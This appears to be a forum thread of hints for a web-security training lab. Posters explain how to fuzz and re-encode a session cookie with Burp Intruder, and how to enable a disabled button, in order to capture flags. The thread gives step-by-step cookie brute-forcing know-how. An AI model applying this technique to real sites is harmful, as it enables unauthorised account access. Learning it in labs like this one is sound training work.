can any one help me please ?
You might be looking at it back to front - youāve got the cookie, which is the bit that you need to fuzz - load the wordlist - thatās your new payload. But itās just that missing letter isnāt it at that point, how to get the original decoded cookie into the payload too is your question 
Then apply your payload processing rules to the whole bundle
Thanks for this advice. This was super helpful! 
I couldnāt figure out a way to create the payload in burp (ie, if put the original cookie and used the list to add a character on the end, only the charcter would get encoded with the rules). I created the list outside of burp manually, and then used it, and was able to get the answer. Another thing to note, is you donāt need to worry about getting all 200s, see if any of your 200s have different lengths and look at the response in that 200.
@dougthonus, Burp takes a little getting used to, but there is actually a cool way to do this in burp. I definitely recommend trying this via intruder again, but this time load the recommended alphanumeric list and use the burp options to manipulate the payload.
Try putting the 31 digit partial cookie as prefix to the payload, then just add the different options to rebuild the cookie. It will run through the list building the md5 and then encoding it before sending it as a request.
It could save you time down the road and help you on other challenges.
-onthesauce
1 Like
So Iām here because Iām stuck on the first question of the whole thing. I was able to complete the others with very little difficulty. So the one Iām stuck on and need a bit of help with is this one
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
So I of course tried this with BurpSuite (Pro as I have a work license). I went to Proxy made sure itās on. Went to the webaddress and sent to the repeater. However I cannot for the life of me figure out how to change the ādisabledā in the code or even delete it in the response. Iāve even tried appending ?getflag=true to the webaddress in proxy and sending back to repeater to see if I could get it to give me what I needed. Not sure what Iām doing wrong but Iām stuck here.
I got it figured out. Found what I was doing wrong.
If you are stuck on Flag #3, here is my hint.
John
4 Likes
For those who want to encode the payload to hex using Zap, you need to add an extension called Community Script from the Market place, then find the to-hex.js script and write click > enable to enable that script
1 Like
For Q3, donāt be a knucklehead like myself. 
You have to enter a flag and not a hash 
I used bash commands to imitate burp functionality.
Yo Knucklehead 1, nice to meet you Iām Knucklehead 2 hahaha <3
Thank you for this
1 Like
I found the flag using burp suite.The flag is written in more than one payload for me every payload with length 1248 has the flag written in it(press on the payload and down press responce then scroll and u will find the flag).first i created the payload list in linux u can do it in many ways the important is having the list(the decoded cookie with with every alphabet(a-z) (A-Z) and number(0-9)) then in the payload processing add : Base64-encode
Encode as ASCII hex
and i unchecked the box in the payload encoding then run the attack.One more tip for the payload position it is the cookie only so add this (Ā§) to the cookie example:
cookie=Ā§4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359586f3dĀ§
and it was GET request.
1 Like
Follow what the hint says. Capture request, send it to intruder. Then decode the cookie. In Payload processing make sure you encode cookie twice in correct order(finished result should not end with ā=ā). Add decoded cookie value as prefix in payload processing. Start Attack. You will get a lot of 200 OK status messages. Click on any one of them and examine responses.
1 Like
I had a lot of trouble and this helped out a lot. I spent a while on it and unchecked the prefix and instead had the cookie in the request only and i got the flag.
My main confusion here was the encoding part of it ill write it out to hopefully help someone.
-
We found a 31 bit cookie in the last problem by decoding it, and we need to find its last character.
-
Obviously, fuzzing is the answer because it lets us guess the last character of the cookie using a payload
-
The problem is (where I got confused) was that our 31 char cookie + 1 char will be in a decoded format, and for the server to read it correctly we need to encode it back
-
So theres two ways we can do this:
a. Either send the 31 char cookie + 1 char payload, encode it using the same operations before (in reverse since we are encoding), then send the encoded payload back to admin.php.
b. Or you can take the last character, encode it, and append it to the original already encoded cookie for a complete one.
Hope this helps
Thank you for this
much appreciated 